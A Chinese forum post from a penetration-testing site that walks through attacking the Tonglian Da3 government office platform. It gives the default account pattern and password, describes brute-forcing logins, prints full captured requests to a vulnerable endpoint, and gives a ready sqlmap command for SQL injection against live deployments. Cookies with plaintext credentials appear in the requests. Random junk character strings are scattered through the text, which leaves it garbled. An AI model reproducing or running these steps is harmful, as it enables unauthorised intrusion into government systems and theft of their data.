中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

/ s$ X) b) _2 e6 L. I
$ U O& L; a/ s, R: S

7 ~& D9 K( O7 e) t) Z

* n; a( i0 W" h- v; q! D1 e 平台简介:: P- W0 H; E, O1 C A) |

" a* U* h; f7 X

" d" C3 Q& j9 V$ @; }( v3 g  : N$ k" I$ a) O

8 D' h: G1 [' u* i

4 O3 M4 G6 ]: e 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
$ _) ]# E6 ?3 [5 k7 \ 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 U4 S, c9 d- E# I 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 4 i8 f( a- S- E: T+ j" U

0 T @7 F& `8 G" j! C- z9 r

3 ]$ m9 S' i _* a7 a3 e. R8 h  2 @" N- Q; Q1 ^; B: D! q# C

- b) f/ G' B4 X9 R

7 c' y" J( V# W. r: O 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:% L$ S" G6 ]' T0 O$ o

3 H; ?, E% D4 W1 S! C% [

. x. q% _1 y* N, H6 ] ?6 s6 @. Y   1 j+ l8 E) l, K% r! F$ x

* ^' |6 ~5 |5 U9 K' }3 G4 B9 F/ p

; k8 _, t& W6 O5 S/ n http://1.1.1.1:7197/cap-aco/#(案例2-) ; c& Z" n7 l6 f' h

: w) g n- w8 V) R, F3 ~

^- ]1 _; n( r$ I# B' o* R http://www.XXOO.com (案例1-官网网站) * V8 ^( R' |+ C' t. _1 }% y

: S6 ?2 e1 _8 ` v

/ V2 n1 v6 m/ e( C( M) u, C- u   + O# ^6 U% c; H

: [5 s5 R! _$ p: X

/ Q' x8 ^5 l/ ?8 Y! p0 a* F, Q* j 漏洞详情:7 ? q7 B4 |! H' K! @1 [- |/ x% w2 N

8 L0 G, u- K% M

$ n1 j, K0 p7 f  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 + {8 }: [& m |2 N5 R4 f7 H0 G

: P/ |, D6 O3 K% k! U/ b! ]( g

: m! l/ @/ j0 a8 u: I) L; j      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:" {* [) y9 m' D. k( s

8 h0 r3 p% {7 _) i" x, ]% D* g

) Z) R% M& s' o   ( C$ r) ~- Z/ n

( p# y& I9 H: I6 @- _+ }! n; u

. T0 ~; m% z; j: y0 x: U  2 t( Q3 K8 D" U* @$ t( Y% v* k

# G$ H; z: [: j, Q" X

4 w4 i; _ Y. Y4 A status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:5 c5 C' V% p6 f$ {3 T

: K" v7 u( ^' d$ Z e9 z

$ K6 D5 J) G$ Z9 n: c1 ] 1、案例1-官方网站: G* k$ H$ o9 Z5 [$ H

4 B5 o% U' ? m* r/ } o

/ e7 P# |! ]# P7 k% Y5 u GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 % H9 p- q: W- A5 X8 V D- M

& H5 K' |! Q9 G% k

7 a9 R% ?0 y! H Host: www.XXOO.com7 X- a* V8 O* s

% u2 Z& \5 G' x2 K" {

! i0 ?, L& f5 m% M' u Proxy-Connection: Keep-Alive $ G, A. Q: C6 D% `" i# B

) m$ G$ {6 O7 D8 R# P+ q+ E

9 P' ~2 H. W& I/ F$ x; W) s Accept: application/json, text/javascript, */*; q=0.01' m( J) x- d9 l- O) R/ k8 q

+ l* x6 R$ v5 [% I. Y; c) ~

_% K+ {! V. r0 w/ q8 ~) S P Accept-Language: zh-CN + }: D4 }2 V& Z- s4 J

/ I" _' T6 d: u( m( x( O" n) M4 M

9 _. H! B4 W, P1 K) x Content-Type: application/json ; o% {, c" J' i! S, G7 ~1 \

2 v$ ?6 O. y! u- S3 N9 T

! u6 e. a; x+ {! ^' O User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko 2 j/ o) N1 {* G+ u' Y1 H

. I5 Z: O* }( U7 k8 B! _

. G& a4 T- k) E% B X-Requested-With: XMLHttpRequest ) u' z# A6 R( C8 P3 q' z8 [& a: d

' _2 q+ R/ k+ ^' h

5 a9 n& h: V$ }# q$ ?/ k0 Y( Z Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002/ V/ ^ p0 @1 P

! w1 u8 g# x" R. _% f' h& W

6 G1 d1 N9 Y) ^3 i) E8 F Accept-Encoding: gzip, deflate, sdch : y% ~( k+ V- W- L( c

8 A6 L; X2 F; X. z2 D

m+ T* ^9 D7 c7 A3 R* \ Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e0 B1 @; l4 P$ s+ c$ m7 Q5 n3 n4 N

1 F8 v! ^2 J* _

# Z5 m7 X# W- Y X9 A3 _ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:8 b0 X, ^. d; ]; O5 J3 y! ?. B

5 O) D0 G3 k' X X3 {

$ i$ _1 h1 G: T/ E) i- R5 [ y2 k6 s( l   0 L+ f( L6 e& k& R4 F, b. M" v

2 B. x5 Y( U u" |. L Z

. z- Z3 W; H/ j, D. `   D! G) T. V& k7 a

9 l3 Q+ d) a& c1 a* @) B' v, [

& \! | ~- }" J n. F! B. Q  , ^9 {: U8 _) W! W0 f/ U2 g

$ S3 e% x& ~& y/ J7 Q* @0 c

' l8 A/ H A; A& k" P! o   1 K9 _9 m6 U8 a: G- [% `5 Y

+ C' d) |2 i' k

$ D H" X3 h/ a0 j  + l! [5 H& _, F' u( h- O

. n! I. H) ~$ E$ t

/ M; @2 ^! u' P1 ?/ [- f 2、案例2-某天河云平台 $ u" y2 \% S4 c: f! h4 ~9 v2 _

+ ?# _* ], T6 e& X( w5 w- I) _3 V

6 S& J5 L/ e' G0 Q GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 , R, _- G: z2 u2 m! o3 O8 @

+ g6 C8 v8 h# \' O1 Y3 X

/ Z) q% Q# }6 S5 r" } Host: 1.1.1.:7197 7 n( O( [+ M" z. e

7 G, q' h/ Z% `- X& Y

9 V1 q7 h" ?1 `0 N& m! `: C5 ] Accept: application/json, text/javascript, */*; q=0.01$ J, a) ]' `6 I' b

9 g3 w0 ~5 C0 k7 H# l. ~1 y* ], I4 u

6 |) b7 k' z4 l {5 I! I I6 S8 S X-Requested-With: XMLHttpRequest 3 }8 n- F6 _) _2 |3 G- _6 g0 d

! ?6 {& d( y( [" j/ X% a

& R8 m7 h7 F N& }/ @ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 0 ?( q4 @4 Z- X: P# ?' ^! Q% O

8 \) E8 t6 S0 L7 D6 o: A7 P, @% Q

; B* f; O& H5 H7 d8 \5 N; D; M Content-Type: application/json , N: q2 g9 t+ H- a

6 z2 A3 n$ @5 J) q# ~8 }

3 c8 U% ]" O" K2 `8 E5 r Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 " o6 M/ t" }' J& ~$ @" U& f% T

2 H% k- l! w/ O- ]& _4 ^

& }& D9 G% \& E# T& W/ V Accept-Language: zh-CN,zh;q=0.8 6 q. r. z, { l% M

0 l6 Y5 k( X! g8 ?

/ I# }; G4 ]' X3 T. \ d* y Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=16 d6 @* l& r9 b3 b- H# A. S4 l2 k

8 G0 H6 N0 S( \3 p

0 `# r8 D% \& Y# U2 | Connection: close ; E X l6 `8 R( W/ o5 E

. r# V X$ y3 `: B& }$ R! K

, Y5 G3 o% v$ H, f/ f c5 k 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) r7 h! ? i9 e

4 x$ K2 G5 H4 V$ ^$ p/ a4 a( {

7 \, l- `% n7 F. M+ \   3 f r; T Q+ l# ]" c

6 b$ S& h5 v) e/ w: I5 U

) H: F9 H5 L4 F1 z- p* W$ Z; r; b
" R1 w$ |8 _* G8 A2 }# A






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2